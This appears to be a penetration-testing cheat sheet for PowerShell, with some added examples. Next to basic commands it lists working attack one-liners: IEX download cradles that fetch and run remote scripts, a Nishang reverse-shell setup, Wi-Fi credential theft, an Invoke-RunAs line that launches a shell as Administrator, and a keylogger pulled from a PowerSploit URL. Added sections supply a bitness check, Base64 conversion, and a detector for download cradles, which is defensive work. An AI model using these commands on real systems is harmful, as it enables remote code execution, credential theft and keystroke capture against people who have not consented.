PowerShell

Basic commands

Help

Get-Help <command> -Detailed

Display all properties

<command> | Select-Object -Property *
<command> | Select *

Get file contents (like type or cat, which is actually available as an alias, I guess)

Get-Content <file>

Delete directory recursively

Remove-Item -Recurse -Force <dir>

Write output to file

<command> | Out-File <file>

Count

(<command>).Count

Measures (Count, Avg, etc.)

<command> | Measure-Object

Whoami

whoami /all

-> SeImpersonatePrivilege (Potato exploits, PrintSpoofer, etc.)

Download file

IEX(New-Object Net.WebClient).downloadString('<url>')

or

IEX(IWR('<url>'))

Check architecture

[environment]::Is64BitOperatingSystem
[environment]::Is64BitProcess

64bit PowerShell path

C:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell
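Added example (not from the original cheat sheet): a small function that combines the two bitness checks above and resolves the native 64-bit PowerShell host. It assumes 64-bit Windows; the SysNative directory is a virtual path that only exists from inside a 32-bit (WOW64) process, which is why the path quoted above works from a 32-bit shell but not from a 64-bit one. The function name Get-PowerShellBitness is made up for this example.

```powershell
# Added example: report OS and process bitness and resolve the native
# 64-bit PowerShell host path. Assumes 64-bit Windows.
function Get-PowerShellBitness {
    $osIs64   = [Environment]::Is64BitOperatingSystem
    $procIs64 = [Environment]::Is64BitProcess

    # A 32-bit process on 64-bit Windows reaches the real System32 through
    # the virtual "Sysnative" directory; a 64-bit process has no such
    # directory and uses System32 directly.
    $sysnativeHost = Join-Path $env:windir 'Sysnative\WindowsPowerShell\v1.0\powershell.exe'
    $system32Host  = Join-Path $env:windir 'System32\WindowsPowerShell\v1.0\powershell.exe'

    $isWow64 = $osIs64 -and -not $procIs64
    $native  = if ($isWow64) { $sysnativeHost } else { $system32Host }

    [pscustomobject]@{
        OsIs64Bit        = $osIs64
        ProcessIs64Bit   = $procIs64
        IsWow64Process   = $isWow64
        NativeHostPath   = $native
        NativeHostExists = (Test-Path -LiteralPath $native)
    }
}

# Usage: run from both a 32-bit and a 64-bit PowerShell to see the
# NativeHostPath change while NativeHostExists stays $true.
Get-PowerShellBitness | Format-List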

Base64 encode file

$fc = Get-Content "filename" -Raw
$fe = [System.Text.Encoding]::UTF8.GetBytes($fc)
[System.Convert]::ToBase64String($fe)

-> -Raw reads the file as one string; without it Get-Content returns one string per line and the line breaks are lost when the array is converted for GetBytes. This only works for text files anyway.
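Added example (not from the original cheat sheet) that generalises the snippet above to any file: it reads raw bytes instead of text, so binaries survive, and it decodes the result back and checks the round trip with a SHA-256 hash. The function names ConvertTo-Base64File and ConvertFrom-Base64File and the sample bytes are constructed for this example; the temp file paths under $env:TEMP are assumptions.

```powershell
# Added example: Base64 encode/decode a file as raw bytes and verify the
# round trip. Works for binary files, unlike the Get-Content approach.
function ConvertTo-Base64File {
    param([Parameter(Mandatory)][string]$Path)
    $full  = (Resolve-Path -LiteralPath $Path).Path
    $bytes = [System.IO.File]::ReadAllBytes($full)
    [System.Convert]::ToBase64String($bytes)
}

function ConvertFrom-Base64File {
    param(
        [Parameter(Mandatory)][string]$Base64,
        [Parameter(Mandatory)][string]$OutPath
    )
    $bytes = [System.Convert]::FromBase64String($Base64)
    [System.IO.File]::WriteAllBytes($OutPath, $bytes)
}

# Constructed sample input: a few bytes that are not valid text (a fake
# "MZ" header, a NUL, CRLF, then 0xFF), so the text-only approach would
# not round-trip it.
$src = Join-Path $env:TEMP 'b64-demo.bin'
$dst = Join-Path $env:TEMP 'b64-demo.restored.bin'
[System.IO.File]::WriteAllBytes($src, [byte[]](0x4D, 0x5A, 0x90, 0x00, 0x0D, 0x0A, 0x41, 0x42, 0x43, 0xFF))

$b64 = ConvertTo-Base64File -Path $src
ConvertFrom-Base64File -Base64 $b64 -OutPath $dst

$before = (Get-FileHash -LiteralPath $src -Algorithm SHA256).Hash
$after  = (Get-FileHash -LiteralPath $dst -Algorithm SHA256).Hash
"Base64: $b64"
"Round trip intact: $($before -eq $after)"

Remove-Item -LiteralPath $src, $dst -Force
```

Get-FileHash is the quickest way to prove the decoded file is byte-identical; comparing lengths alone would miss a corrupted byte.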

Nishang

Offensive PowerShell for red team, penetration testing and offensive security. GitHub - samratashok/nishang

Gather information

powershell -ExecutionPolicy bypass -file Get-Information.ps1 > results.txt

Get wifi creds

.\Get-WLAN-Keys.ps1

Reverse shell

/usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1

-> Append Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port> to Invoke-PowerShellTcp.ps1 to automatically execute the shell

Remote execution

powershell IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')

or

powershell -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')
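Added example (not from the original cheat sheet, nor from Nishang) for the detection side of the "Download file" and "Remote execution" one-liners: a function that flags the download-cradle shape (IEX paired with WebClient.DownloadString or Invoke-WebRequest) in PowerShell script block text. Script Block Logging records the text that actually runs as event 4104 in the Microsoft-Windows-PowerShell/Operational log, regardless of -ExecutionPolicy, so these in-memory cradles show up there even though nothing is written to disk. The function name Find-DownloadCradle and the sample script blocks are constructed for this example; the Get-WinEvent line at the end is the assumed way to feed it real entries.

```powershell
# Added example: flag download-cradle patterns in PowerShell script text.
function Find-DownloadCradle {
    param([Parameter(Mandatory)][string[]]$ScriptText)

    # -match is case-insensitive by default, which matters for iex/IEX.
    $indicators = [ordered]@{
        'IEX/Invoke-Expression'    = '\b(IEX|Invoke-Expression)\b'
        'WebClient.Download*'      = 'Net\.WebClient.*?Download(String|Data|File)'
        'Invoke-WebRequest/IWR'    = '\b(IWR|Invoke-WebRequest|IRM|Invoke-RestMethod)\b'
        'ExecutionPolicy override' = '-ExecutionPolicy\s+(bypass|unrestricted)'
    }

    foreach ($text in $ScriptText) {
        $hits = @($indicators.GetEnumerator() |
                  Where-Object { $text -match $_.Value } |
                  ForEach-Object { $_.Key })

        # The cradle shape is IEX plus any fetch primitive; the other
        # indicators on their own are weaker signals.
        $isCradle = ($hits -contains 'IEX/Invoke-Expression') -and
                    (($hits -contains 'WebClient.Download*') -or
                     ($hits -contains 'Invoke-WebRequest/IWR'))

        [pscustomobject]@{
            IsCradle   = $isCradle
            Indicators = ($hits -join ', ')
            Script     = $text
        }
    }
}

# Constructed sample script blocks (not real log data). The first three
# mirror the one-liners on this page; the last is benign.
$samples = @(
    "IEX(New-Object Net.WebClient).downloadString('http://<ip>/shell.ps1')",
    "IEX(IWR('http://<ip>/x.ps1'))",
    "powershell -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')",
    "Get-ChildItem C:\Windows\Temp | Measure-Object"
)
Find-DownloadCradle -ScriptText $samples | Format-Table -AutoSize

# On a host with Script Block Logging enabled, feed the function the logged
# text instead (Properties[2] of a 4104 event is the ScriptBlockText field):
# $logged = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { $_.Properties[2].Value }
# Find-DownloadCradle -ScriptText $logged | Where-Object IsCradle
```

The first three samples come back with IsCradle set, the benign Get-ChildItem line does not. Execution policy is not a security boundary, which is exactly why the -ExecutionPolicy override is listed only as a supporting indicator rather than a verdict on its own.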

PowerShell-Suite

This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind. GitHub - FuzzySecurity/PowerShell-Suite

Invoke-RunAs.ps1

Invoke-RunAs -User Administrator -Password <pw> -LogonType 0x1 -Binary c:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell.exe -Args "IEX(New-Object Net.WebClient).downloadString('http://<ip>/shell.ps1')"

-> Put at the bottom of Invoke-RunAs.ps1, if not working otherwise

Keylogger

IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
Get-Keystrokes -LogPath C:\key.log -CollectionInterval 1